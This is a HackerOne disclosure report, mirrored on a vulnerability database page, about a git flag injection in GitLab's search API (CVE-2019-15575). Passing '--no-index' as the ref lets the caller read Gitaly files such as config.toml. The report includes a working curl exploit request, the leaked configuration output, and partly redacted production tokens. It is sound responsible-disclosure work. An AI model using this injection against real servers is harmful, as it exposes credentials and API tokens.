Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneVakzzH1:682442
HistoryAug 26, 2019 - 11:47 p.m.

GitLab: Git flag injection - Search API with scope 'blobs'

2019-08-2623:47:50
vakzz
hackerone.com
$7000
15

0.004 Low

EPSS

Percentile

72.6%

JSON

As requested from @hackerjuan, breaking this out of https://hackerone.com/reports/658013 for easier tracking.

Summary

Gitlab 12.1.6 fixed the wiki_blobs scope of the search api, but the blobs scope is still vulnerable to git flag injection and allows reading any file in /var/opt/gitlab/gitaly including config.toml.

Steps to reproduce

Make a search API call setting the ref parameter to --no-index, search to a common character such as . or a, and scope to blobs:

curl --header "PRIVATE-TOKEN: $TOKEN" 'http://gitlab-vm.local/api/v4/projects/4/search?scope=blobs&search=.&ref=--no-index

[{"basename":null,"data":"VERSION\u00001\u0000Gitaly, version 1.53.2\n","filename":null,"id":null,"ref":"--no-index","startline":0,"project_id":4},{"basename":null,"data":"config.toml\u00001\u0000# Gitaly configuration file\nconfig.toml\u00002\u0000# This file is managed by gitlab-ctl. Manual changes will be\nconfig.toml\u00003\u0000# erased! To change the contents below, edit /etc/gitlab/gitlab.rb\nconfig.toml\u00004\u0000# and run:\nconfig.toml\u00005\u0000# sudo gitlab-ctl reconfigure\nconfig.toml\u00006\u0000\nconfig.toml\u00007\u0000socket_path = '/var/opt/gitlab/gitaly/gitaly.socket'\nconfig.toml\u00008\u0000bin_dir = '/opt/gitlab/embedded/bin'\nconfig.toml\u00009\u0000\n","filename":null,"id":null,"ref":"--no-index","startline":0,"project_id":4}]

The ref parameter ends up being passed to git grep and setting it to --no-index includes the current working directory and files not managed by git:

/opt/gitlab/embedded/bin/git --git-dir /var/opt/gitlab/git-data/repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.git grep --ignore-case -I --line-number --null --before-context 2 --after-context 2 --perl-regexp -e a --no-index

Impact

The config.toml can contain sensitive information, api keys and tokens. For example on gitlab.com it contain the sentry.io api tokens as well as the gitaly token:

https://gitlab.com/api/v4/projects/2009901/search?scope=blobs&search=a&ref=--no-index

sentry_dsn = 'https://927bee37df654608xxxxxxxxxxxxxxxx:[email protected]/16
ruby_sentry_dsn = 'https://8ff7dd344e1d4976xxxxxxxxxxxxxxxx:bb9d785b3fe7447bxxxxxxxxxxxxxxxx@sentry.gitlab.net/29

token = 'yfZTE0Oxxxxxxx'

I haven’t looked into what is possible with the above tokens as potentially there is sensitive information in sentry.io.

Let me know if you have any questions or require any other information.

Cheers,
Will

Impact

Read access to any file in /var/opt/gitlab/gitaly including config.toml which may contain sensitive information, tokens, and API keys

Related

nvd 1
cve 1
ubuntucve 1
debiancve 1
cvelist 1
prion 1
osv 1
nvd
nvd
CVE-2019-15575
2019-12-18 21:15:11
cve
cve
CVE-2019-15575
2019-12-18 21:15:11
ubuntucve
ubuntucve
CVE-2019-15575
2019-12-18 00:00:00
debiancve
debiancve
CVE-2019-15575
2019-12-18 21:15:11
cvelist
cvelist
CVE-2019-15575
2019-12-18 21:00:16
prion
prion
Command injection
2019-12-18 21:15:00
osv
osv
CVE-2019-15575
2019-12-18 21:15:11

0.004 Low

EPSS

Percentile

72.6%

JSON
Related for H1:682442
nvd1cve1ubuntucve1debiancve1cvelist1prion1osv1